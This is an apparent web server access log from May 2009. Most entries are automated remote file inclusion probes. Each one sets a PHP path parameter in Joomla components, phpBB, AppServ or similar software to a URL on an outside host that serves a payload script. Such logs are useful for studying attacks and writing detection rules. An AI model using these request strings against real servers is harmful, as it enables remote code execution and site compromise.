209.59.12.99 - - [07/May/2009:22:10:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.59.11.66 - - [07/May/2009:22:10:02 -0400] "GET /logs/access_log.Q108062800%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:10:47 -0400] "GET /logs/access_log.Q108060700%20%20/errors.php?error=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.72.114 - - [07/May/2009:22:11:26 -0400] "GET /logs/access_log.Q107112600 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.32.100.130 - - [07/May/2009:22:12:30 -0400] "GET /logs/access_log.Q108111600%20%20/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.121.201.70 - - [07/May/2009:22:13:18 -0400] "GET /logs/access_log.Q108102400//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 242 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
116.121.201.70 - - [07/May/2009:22:13:19 -0400] "GET //appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 215 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
116.121.201.70 - - [07/May/2009:22:13:21 -0400] "GET /logs/access_log.Q108102400//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
116.121.201.70 - - [07/May/2009:22:13:22 -0400] "GET //appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
116.121.201.70 - - [07/May/2009:22:13:22 -0400] "GET /logs//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.65"
217.199.222.19 - - [07/May/2009:22:13:26 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:22:13:26 -0400] "GET /logs/access_log.Q108090900%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:22:13:26 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:13:42 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:13:42 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
116.121.201.70 - - [07/May/2009:22:14:18 -0400] "GET /logs/access_log.Q108111600//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 242 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.32.100.130 - - [07/May/2009:22:14:19 -0400] "GET /logs/access_log.Q108060700%20%20/errors.php?error=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.254.231.239 - - [07/May/2009:22:14:44 -0400] "GET /logs/access_log.Q108082900/errors.php?error=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.51.131.210 - - [07/May/2009:22:14:45 -0400] "GET /logs/access_log.Q108083100//include/lib.inc.php?site_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
209.51.131.210 - - [07/May/2009:22:14:45 -0400] "GET //include/lib.inc.php?site_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.811"
209.51.131.210 - - [07/May/2009:22:14:45 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.811"
209.59.12.99 - - [07/May/2009:22:15:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.121.201.70 - - [07/May/2009:22:15:18 -0400] "GET /logs/access_log.Q108111600//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
209.51.131.210 - - [07/May/2009:22:15:23 -0400] "GET //include/lib.inc.php?site_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.811"
66.249.72.114 - - [07/May/2009:22:15:34 -0400] "GET /images/items/index19_bldpressmo.jpg HTTP/1.1" 200 3955 "-" "Googlebot-Image/1.0"
216.246.55.235 - - [07/May/2009:22:16:15 -0400] "GET //include/lib.inc.php?site_path=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
216.246.55.235 - - [07/May/2009:22:16:15 -0400] "GET /logs//include/lib.inc.php?site_path=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
216.246.55.235 - - [07/May/2009:22:16:15 -0400] "GET /logs/access_log.Q108083100//include/lib.inc.php?site_path=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.51.131.210 - - [07/May/2009:22:16:25 -0400] "GET /logs/access_log.Q108101700//include/lib.inc.php?site_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
116.121.201.70 - - [07/May/2009:22:16:36 -0400] "GET //appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
121.254.231.239 - - [07/May/2009:22:17:03 -0400] "GET /logs/access_log.Q108070800%20%20/index1.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.254.231.239 - - [07/May/2009:22:17:03 -0400] "GET /logs/index1.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.254.231.239 - - [07/May/2009:22:17:03 -0400] "GET /index1.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.254.231.239 - - [07/May/2009:22:17:03 -0400] "GET /logs/access_log.Q108061300%20%20/index1.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.121.201.70 - - [07/May/2009:22:17:13 -0400] "GET /logs/access_log.Q108102400//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
116.121.201.70 - - [07/May/2009:22:17:13 -0400] "GET //appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
116.121.201.70 - - [07/May/2009:22:17:14 -0400] "GET /logs//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.65"
121.254.231.239 - - [07/May/2009:22:17:29 -0400] "GET /logs/access_log.Q108070800/index1.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.254.231.239 - - [07/May/2009:22:17:29 -0400] "GET /logs/access_log.Q108061300/index1.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:17:33 -0400] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:17:33 -0400] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:17:35 -0400] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:17:35 -0400] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:17:38 -0400] "GET /logs/access_log.Q109030200//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:17:40 -0400] "GET /logs/access_log.Q109030200//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.232.85.205 - - [07/May/2009:22:17:47 -0400] "GET /main.php?page=http://www.feldman.co.il/installation/includes/idxx.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.232.85.205 - - [07/May/2009:22:18:16 -0400] "GET /logs/access_log.Q108092300%20%20/main.php?page=http://www.feldman.co.il/installation/includes/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:18:18 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:18:18 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:18:18 -0400] "GET /logs/access_log.Q108072700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:18:21 -0400] "GET /logs/access_log.Q108072700//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:18:21 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:18:21 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
212.59.11.66 - - [07/May/2009:22:18:23 -0400] "GET /logs/access_log.Q108072200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
217.199.222.19 - - [07/May/2009:22:18:31 -0400] "GET //ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:22:18:31 -0400] "GET /logs//ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:22:18:31 -0400] "GET /logs/access_log.Q109021800//ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:22:18:31 -0400] "GET /logs/access_log.Q108113000//ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:22:18:37 -0400] "GET /logs/access_log.Q109021800%20%20//ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
116.121.201.70 - - [07/May/2009:22:18:37 -0400] "GET /logs/access_log.Q108111600//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
217.199.222.19 - - [07/May/2009:22:18:37 -0400] "GET /logs/access_log.Q108113000%20%20//ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:18:38 -0400] "GET /logs/access_log.Q108072200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
62.116.168.108 - - [07/May/2009:22:18:45 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.116.168.108 - - [07/May/2009:22:18:45 -0400] "GET /logs/access_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.116.168.108 - - [07/May/2009:22:18:45 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.116.168.108 - - [07/May/2009:22:18:45 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:18:53 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:18:53 -0400] "GET /logs/access_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:18:53 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:18:53 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.254.231.239 - - [07/May/2009:22:19:15 -0400] "GET /index1.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.254.231.239 - - [07/May/2009:22:19:15 -0400] "GET /logs/index1.php?x=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.64.202.134 - - [07/May/2009:22:19:15 -0400] "GET /logs/access_log.Q108100100//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
208.64.202.134 - - [07/May/2009:22:19:21 -0400] "GET /logs/access_log.Q108090900//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [07/May/2009:22:20:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.197.202.64 - - [07/May/2009:22:20:08 -0400] "GET /logs/access_log.Q109013100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:20:08 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:22:20:16 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:22:20:16 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:22:20:25 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.212.195 - - [07/May/2009:22:20:25 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
84.249.98.192 - - [07/May/2009:22:20:50 -0400] "GET /logs/access_log.Q109021900//?_PHPLIB[libdir]=http://ircd.lordwar.net/id? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
84.249.98.192 - - [07/May/2009:22:20:52 -0400] "GET //?_PHPLIB[libdir]=http://ircd.lordwar.net/id? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
84.249.98.192 - - [07/May/2009:22:20:52 -0400] "GET /logs//?_PHPLIB[libdir]=http://ircd.lordwar.net/id? HTTP/1.1" 200 351 "-" "libwww-perl/5.803"
208.64.202.134 - - [07/May/2009:22:20:57 -0400] "GET /logs/access_log.Q108100100//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
208.64.202.134 - - [07/May/2009:22:21:03 -0400] "GET /logs/access_log.Q108090900//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
216.246.55.235 - - [07/May/2009:22:21:20 -0400] "GET /logs/access_log.Q108083100%20%20//include/lib.inc.php?site_path=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
62.116.168.108 - - [07/May/2009:22:21:39 -0400] "GET /logs/access_log.Q109013100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.116.168.108 - - [07/May/2009:22:21:50 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:21:52 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:21:52 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:21:52 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:21:52 -0400] "GET /logs/access_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:21:54 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:21:54 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:21:54 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
122.116.178.20 - - [07/May/2009:22:21:54 -0400] "GET /logs/access_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.142.94 - - [07/May/2009:22:21:54 -0400] "GET /logs/access_log.Q109032100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.246.55.235 - - [07/May/2009:22:22:00 -0400] "GET /logs/access_log.Q108101700%20%20//include/lib.inc.php?site_path=http://stop-op.com/cfg/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
72.30.142.94 - - [07/May/2009:22:22:08 -0400] "GET /logs/error_log.Q107122800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.243.71 - - [07/May/2009:22:22:10 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.38.243.71 - - [07/May/2009:22:22:12 -0400] "GET /logs/access_log.Q109032900//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.38.243.71 - - [07/May/2009:22:22:12 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.38.243.71 - - [07/May/2009:22:22:12 -0400] "GET /logs/access_log.Q108100900//include/print_category.php?setup[use_category]=1&dir=http://www.marriageinmind.com/aff/1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:22:53 -0400] "GET /logs/access_log.Q109030200%20%20//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
84.249.98.192 - - [07/May/2009:22:22:57 -0400] "GET /logs/error_log.Q109042700//?_PHPLIB[libdir]=http://ircd.lordwar.net/id? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
77.221.130.2 - - [07/May/2009:22:23:36 -0400] "GET /logs/access_log.Q108091300%20%20//?page=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.221.130.2 - - [07/May/2009:22:23:36 -0400] "GET //?page=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
77.221.130.2 - - [07/May/2009:22:23:36 -0400] "GET /logs//?page=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 200 351 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:23:39 -0400] "GET /logs/access_log.Q109030200%20%20//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:22:24:02 -0400] "GET //ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
217.199.222.19 - - [07/May/2009:22:24:02 -0400] "GET /logs//ashnews.php?pathtoashnews=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:24:22 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:24:22 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:22:24:22 -0400] "GET /logs/access_log.Q108081700%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [07/May/2009:22:25:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.59.11.66 - - [07/May/2009:22:26:23 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:26:23 -0400] "GET /logs/access_log.Q108070500//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:26:23 -0400] "GET /logs/access_log.Q108072000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:26:23 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:26:33 -0400] "GET /logs/access_log.Q108070500//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:26:33 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:26:33 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.59.11.66 - - [07/May/2009:22:26:33 -0400] "GET /logs/access_log.Q108072000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.elgadget.ru/tmp/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:22:26:36 -0400] "GET /logs/access_log.Q109042500//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.221.130.17 - - [07/May/2009:22:26:49 -0400] "GET /logs/access_log.Q108092700/newspublish/include.php?path%5Bdocroot%5D=http://208.98.22.241/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
77.221.130.17 - - [07/May/2009:22:26:49 -0400] "GET /newspublish/include.php?path%5Bdocroot%5D=http://208.98.22.241/id.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
77.221.130.17 - - [07/May/2009:22:26:49 -0400] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://208.98.22.241/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
210.118.194.225 - - [07/May/2009:22:27:12 -0400] "GET /logs/access_log.Q108111300//appserv/main.php?appserv_root=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.813"
